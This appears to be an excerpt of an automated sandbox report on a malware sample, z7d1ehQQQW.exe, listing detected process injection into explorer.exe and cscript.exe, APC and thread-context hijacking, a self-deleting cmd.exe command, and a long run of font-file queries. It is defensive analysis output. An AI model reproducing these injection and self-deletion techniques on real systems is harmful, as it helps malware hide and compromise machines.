            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 1C0000
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeMemory written: C:\Users\user\Desktop\z7d1ehQQQW.exe base: 400000 value starts with: 4D5A
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeThread register set: target process: 3424
            Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3424
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess created: C:\Users\user\Desktop\z7d1ehQQQW.exe C:\Users\user\Desktop\z7d1ehQQQW.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
            Source: explorer.exe, 00000006.00000000.676817795.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 00000006.00000000.762191972.0000000001080000.00000002.00020000.sdmp, cscript.exe, 00000009.00000002.917987042.0000000003140000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000006.00000000.762191972.0000000001080000.00000002.00020000.sdmp, cscript.exe, 00000009.00000002.917987042.0000000003140000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.762191972.0000000001080000.00000002.00020000.sdmp, cscript.exe, 00000009.00000002.917987042.0000000003140000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000006.00000000.762191972.0000000001080000.00000002.00020000.sdmp, cscript.exe, 00000009.00000002.917987042.0000000003140000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000006.00000000.689219732.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Users\user\Desktop\z7d1ehQQQW.exe VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
